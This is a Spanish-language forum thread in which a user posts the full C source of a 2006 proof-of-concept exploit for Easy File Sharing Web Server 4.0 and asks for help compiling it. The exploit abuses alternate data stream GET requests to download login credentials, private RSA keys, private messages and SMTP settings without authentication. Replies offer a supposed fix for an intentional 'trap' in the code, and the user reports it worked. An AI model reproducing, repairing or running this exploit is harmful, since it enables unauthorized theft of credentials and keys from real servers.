Hola!!! Qtal va??
Weno mi duda surge al intentar compilar en C un exploit para mi servidor lo cierto esque no veo el error. Mis conocimientos en C no son abrumadores, por lo que acudo a vosotros   X-D   Os adjunto codigo de esta por si teneis alguna idea:



/*
===================================================================
0-day Alternative File Stream Exploit for Easy File Share Server 4
===================================================================
Exploit allows malicious users to grab files from the server without
being authenticated completely bypassing security.


0-day Easy File Sharing Web Server v4.0 Information Stealer
Discovered and Coded by Greg Linares ==> GLinares.code [at] gmail [dot] com
This tool demonstrates EFS Web Server's Vulnerability to Alternative
Data Stream GET requests which allow unauthorized users to download server
critical files.

Discovered and Reported: 10-30-2006

Usage: exploit <hostname/IP> [port 80=default] [Method see below]

--------PoC Methods:-----
1 = Gather all login username and passwords and email addresses.[Default]
2 = Gather Private RSA Key and Certificates for server.
3 = Gather Private Messages used by Forum Users on the server
4 = Gather Server Settings File and SMTP server info.

*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>      /* Win32 API */
#include <wininet.h>      /* WinInet API */
int mthd;
unsigned short httpport;
char exploit[512], exploit2[512], exploit3[512], exploit4[512];
char logmsg[512];
char endmsg[512];
HINTERNET inet;         /* WinInet Internet Handle */
FILE *file;

void ExploitHTTP (HINTERNET inet, const char *host, const char *exp)
{

     HINTERNET connection;      /* Connection Handle */
    HINTERNET request;         /* Request Handle */
    unsigned long flags;      /* HttpOpenRequest Flags */

   char buffer[BUFSIZ];
    unsigned long len;


   printf("HOST: %s\n", host);
   printf("PORT: %i\n", httpport);

   if ((connection = InternetConnect(inet, host, httpport,
                  NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0))
       == NULL)
   {
      printf("Failed to Connect...Exiting\n");
      InternetCloseHandle(inet);
      fclose(file);
      exit(1);
   }

   flags = INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_AUTO_REDIRECT |
       INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_COOKIES |
       INTERNET_FLAG_RELOAD;

   strcat(exp, "%3A%3A%24%44%41%54%41");

   request = HttpOpenRequest(connection, "GET", exp, "HTTP/1.0", NULL, NULL, flags, 0);
   if (request == NULL)
   {
      printf("HTTP Open Request failed....Exiting\n");
      InternetCloseHandle(connection);
      InternetCloseHandle(inet);
      fclose(file);
      exit(1);
   }
   if (!HttpSendRequest(request, NULL, 0, NULL, 0))
   {
      printf("HTTP Send Request failed....Exiting\n");
      InternetCloseHandle(request);
      InternetCloseHandle(connection);
      InternetCloseHandle(inet);
      fclose(file);
      exit(1);
   }
   printf("Exploit Sent...Dumping HTTP Return Packet...");
   sleep(1000);

   while (InternetReadFile(request, buffer, sizeof buffer, &len) && len > 0)
   {
      fwrite(buffer, len, 1, file);
      if (fwrite(buffer, len, 1, stdout) < 1)
      {
            printf("Error Outputting HTTP Return Packet\n");
      }
   }
   InternetCloseHandle(request);
    InternetCloseHandle(connection);
}


int main (int argc, char *argv[])
{

   printf("\n=========================================================================\n");
   printf("0-day Easy File Sharing Web Server v4.0 Information Stealer\n");
   printf("Discovered and Coded by Greg Linares ==> GLinares.code [at] gmail [dot] com\n");
   printf("This tool demonstrates EFS Web Server's Vulnerability to Alternative\n");
   printf("Data Stream GET requests which allow unauthorized users to download server \n");
   printf("critical files.\n");
   printf("Discovered and Reported: 10-30-2006\n");
   printf("\nUsage: %s <hostname/IP> [port 80=default] [Method see below]\n", argv[0]);
   printf("--------PoC Methods:-----\n");
   printf("1 = Gather all login username and passwords and email addresses.[Default]\n");
   printf("2 = Gather Private RSA Key and Certificates for server.\n");
   printf("3 = Gather Private Messages used by Forum Users on the server\n");
   printf("4 = Gather Server Settings File and SMTP server info.\n");
   printf("============================================================================\n");


    inet = InternetOpen("ESF Exp", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    if (inet == NULL)
   {
      printf("Error accessing InternetOpen API - Exiting...\n");
      exit(1);
   }
   if (argc < 2)
   {
      printf("Invalid # of arguments...Exiting\n");
      exit(1);
   }
   if (atoi(argv[3]) > 4)
   {
      mthd = 1;
   }
   if (atoi(argv[3]) <= 0)
   {
      mthd = 1;
   }
   mthd = atoi(argv[3]);

   /* Set Up Exploits */
   switch(mthd)
   {
       case 1:
         file = fopen("Accounts.txt","a+");
         sprintf(exploit, "%s", "%75%73%65%72%2E%73%64%62");
         sprintf(endmsg, "%s", "\n\n\nResults Dumped to Accounts.txt\n");
         break;
      case 2:
         file = fopen("RSAKeys.txt", "a+");
         sprintf(exploit, "%s", "%53%65%72%76%65%72%4B%65%79%2E%70%65%6D");
         sprintf(endmsg, "%s", "\n\n\nResults Dumped to RSAKeys.txt\n");
         break;
      case 3:
         file = fopen("Messages.txt", "a+");
         sprintf(exploit, "%s", "%6D%73%67%31%2E%73%64%62");
         sprintf(endmsg, "%s", "\n\n\nResults Dumped to Messages.txt\n");
         break;
      case 4:
         file = fopen("Server.txt", "a+");
         sprintf(exploit, "%s", "%6F%70%74%69%6F%6E%2E%69%6E%69");
         sprintf(endmsg, "%s", "\n\n\nResults Dumped to Server.txt\n");
         break;
   }



   sprintf(logmsg, "%s", argv[1]);
   sprintf(logmsg, "%s", "\r\n\r\n\r\n");
   fwrite(logmsg, strlen(logmsg), 1, file);
   httpport = atoi(argv[2]);
   ExploitHTTP(inet, argv[1], exploit);
   if (mthd == 3)
   {
      printf("\n\n Sending 2nd Exploit...\n");
      strcat(exploit2, "%6D%73%67%32%2E%73%64%62");
      ExploitHTTP(inet, argv[1], exploit2);
      printf("\n\n Sending 3rd Exploit...\n");
      strcat(exploit3, "%6D%73%67%33%2E%73%64%62");
      ExploitHTTP(inet, argv[1], exploit3);
      printf("\n\n Sending final Exploit...\n");
      strcat(exploit4, "%6D%73%67%34%2E%73%64%62");
      ExploitHTTP(inet, argv[1], exploit4);
   }
   if (mthd == 2)
   {
      printf("\n\n Sending 2nd Exploit...\n");
      strcat(exploit2, "%53%65%72%76%65%72%43%65%72%74%2E%70%65%6D");
      ExploitHTTP(inet, argv[1], exploit2);
      printf("\n\n Sending final Exploit...\n");
      strcat(exploit3, "%52%6F%6F%74%43%65%72%74%2E%70%65%6D");
      ExploitHTTP(inet, argv[1], exploit3);
   }
   fclose(file);

    Sleep(500);
    InternetCloseHandle(inet);
   printf("\n\n===================================================\n");
   printf("%s\n", endmsg);
   printf("Proof Of Concept Exploit by Greg Linares\n");
   printf("Send Comments/Concerns/Questions/Etc to GLinares.code [at] gmail [dot] com\n");
    return 0;

}



Por cierto lo que me devuelve el compilador es lo siguiente:

linea 67 C:\EFS_alt_data_streams.c [Warning] passing arg 1 of `strcat' discards qualifiers from pointer target type
 Por lo que:     strcat(exp, "%3A%3A%24%44%41%54%41");
es lo que falla. Parece que no registra el puntero????
Weno, al menos muchas gracias por hacerme un poco de caso.
Un saludo.

el problema es q no sabe compilar. :p

igual me parece q el programa real es con "\x", no con %, jaja es una trampita igual no estoy seguro lo vi asi nomas.

Prueva lo que dice Ferchu, canvia los % por \x de la linea 67.
En los exploits suelen poner tramas para que no los usen los que no saben de programación.

Saludos

Muchas gracias berz3k!!!! Funcionó. Te haré caso y recuperaré mis apuntes de C.
Un saludo a todos.